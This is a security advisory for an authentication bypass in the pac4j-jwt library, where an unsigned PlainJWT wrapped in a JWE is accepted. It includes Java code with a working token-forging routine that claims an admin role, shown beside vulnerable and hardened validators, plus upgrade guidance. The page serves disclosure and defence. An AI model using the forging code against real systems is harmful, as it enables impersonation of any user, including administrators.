pac4j-jwt Authentication Bypass Vulnerability in JwtAuthenticator

Vulnerability

An authentication bypass vulnerability has been identified in the pac4j-jwt library, in versions prior to 4.5.9, 5.7.9, and 6.3.3. The flaw lies in how the JwtAuthenticator component handles encrypted JSON Web Tokens (JWE). A remote attacker can forge an authentication token by building a PlainJWT (an unsigned JWT, header alg "none") carrying arbitrary subject and role claims and wrapping it in a JWE encrypted for the server. The vulnerable authenticator decrypts the JWE and accepts the inner unsigned token without signature verification, so the attacker can authenticate as any user, including administrators. The only material required is the server's RSA public key, which is what encrypts the JWE; no signing key or other secret is needed.
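The following is an added example, not code from pac4j or from the advisory, written against the nimbus-jose-jwt API that pac4j-jwt builds on. It shows the forged token the advisory describes (a PlainJWT nested in an RSA-OAEP JWE), a vulnerable validator that returns the decrypted claims as-is, and a hardened validator that rejects anything but a verified SignedJWT inside the JWE. The class and method names are mine, and the two RSA key pairs are generated in place to stand in for the server's encryption key pair and the issuer's signing key pair.

```java
import com.nimbusds.jose.*;
import com.nimbusds.jose.crypto.RSADecrypter;
import com.nimbusds.jose.crypto.RSAEncrypter;
import com.nimbusds.jose.crypto.RSASSASigner;
import com.nimbusds.jose.crypto.RSASSAVerifier;
import com.nimbusds.jwt.*;

import java.security.KeyPair;
import java.security.KeyPairGenerator;
import java.security.interfaces.RSAPrivateKey;
import java.security.interfaces.RSAPublicKey;
import java.util.List;

// Illustrative class, not part of pac4j-jwt.
public class JweNestedPlainJwtCheck {

    // Vulnerable pattern: decrypt the JWE and trust whatever claims are inside,
    // never asking whether the inner token carries a verified signature.
    static JWTClaimsSet vulnerableValidate(String token, RSAPrivateKey decryptKey) throws Exception {
        JWEObject jwe = JWEObject.parse(token);
        jwe.decrypt(new RSADecrypter(decryptKey));
        JWT inner = JWTParser.parse(jwe.getPayload().toString());
        return inner.getJWTClaimsSet();   // PlainJWT claims come back unverified
    }

    // Hardened pattern: after decryption, require a SignedJWT and verify it;
    // a PlainJWT (alg "none") or a further nested JWE is rejected outright.
    static JWTClaimsSet hardenedValidate(String token, RSAPrivateKey decryptKey,
                                         RSAPublicKey verifyKey) throws Exception {
        JWEObject jwe = JWEObject.parse(token);
        jwe.decrypt(new RSADecrypter(decryptKey));
        JWT inner = JWTParser.parse(jwe.getPayload().toString());
        if (!(inner instanceof SignedJWT)) {
            throw new SecurityException("inner token is not a signed JWT, alg="
                    + inner.getHeader().getAlgorithm());
        }
        SignedJWT signed = (SignedJWT) inner;
        if (!signed.verify(new RSASSAVerifier(verifyKey))) {
            throw new SecurityException("signature verification failed");
        }
        return signed.getJWTClaimsSet();
    }

    // Attacker side as described in the advisory: a PlainJWT with chosen claims,
    // encrypted for the server using nothing but its RSA public key.
    static String forgeToken(RSAPublicKey serverPublicKey) throws Exception {
        JWTClaimsSet claims = new JWTClaimsSet.Builder()
                .subject("admin")
                .claim("roles", List.of("ROLE_ADMIN"))
                .build();
        PlainJWT plain = new PlainJWT(claims);   // header alg=none, no signature at all
        JWEObject jwe = new JWEObject(
                new JWEHeader.Builder(JWEAlgorithm.RSA_OAEP_256, EncryptionMethod.A256GCM)
                        .contentType("JWT").build(),
                new Payload(plain.serialize()));
        jwe.encrypt(new RSAEncrypter(serverPublicKey));
        return jwe.serialize();
    }

    public static void main(String[] args) throws Exception {
        KeyPairGenerator gen = KeyPairGenerator.getInstance("RSA");
        gen.initialize(2048);
        KeyPair encKeys = gen.generateKeyPair();   // stands in for the server's encryption key pair
        KeyPair sigKeys = gen.generateKeyPair();   // stands in for the issuer's signing key pair

        String forged = forgeToken((RSAPublicKey) encKeys.getPublic());

        // Vulnerable path: the forged claims are returned as if authenticated.
        JWTClaimsSet accepted = vulnerableValidate(forged, (RSAPrivateKey) encKeys.getPrivate());
        System.out.println("vulnerable path accepted subject=" + accepted.getSubject()
                + " roles=" + accepted.getClaim("roles"));

        // Hardened path: the same token is rejected.
        try {
            hardenedValidate(forged, (RSAPrivateKey) encKeys.getPrivate(),
                    (RSAPublicKey) sigKeys.getPublic());
            System.out.println("hardened path accepted the forged token (BUG)");
        } catch (SecurityException e) {
            System.out.println("hardened path rejected the forged token: " + e.getMessage());
        }

        // A token that was signed by the issuer and then encrypted still passes.
        SignedJWT signed = new SignedJWT(new JWSHeader(JWSAlgorithm.RS256),
                new JWTClaimsSet.Builder().subject("alice").build());
        signed.sign(new RSASSASigner(sigKeys.getPrivate()));
        JWEObject legit = new JWEObject(
                new JWEHeader.Builder(JWEAlgorithm.RSA_OAEP_256, EncryptionMethod.A256GCM)
                        .contentType("JWT").build(),
                new Payload(signed));
        legit.encrypt(new RSAEncrypter((RSAPublicKey) encKeys.getPublic()));
        JWTClaimsSet ok = hardenedValidate(legit.serialize(),
                (RSAPrivateKey) encKeys.getPrivate(), (RSAPublicKey) sigKeys.getPublic());
        System.out.println("hardened path accepted signed token subject=" + ok.getSubject());
    }
}
```

The point the hardened path makes is that JWE gives confidentiality, not authenticity: anyone holding the public key can produce a JWE the server will decrypt, so the claims must be bound to a signature that is verified after decryption. Checking the concrete type of the nested token (SignedJWT, never PlainJWT) is the minimum; an application should additionally pin the expected signing algorithm and issuer.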

Impact

Successful exploitation yields a full authentication bypass: the attacker presents a forged token that the application accepts as genuine and is authenticated as any user it names, including accounts with administrative roles.

Remediation

Users of pac4j-jwt should upgrade to version 4.5.9 or newer for the 4.x line, version 5.7.9 or newer for the 5.x line, and version 6.3.3 or newer for the 6.x line.

Added: Mar 4, 2026, 10:26 PM
Updated: Mar 4, 2026, 10:26 PM

Vulnerability Rating

Custom Algorithm
spread: 0.0
impact: 5.0
exploitability: 8.0
remediation: 0.0
relevance: 3.5
threat: 4.8
urgency: 2.9
incentive: 4.2

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.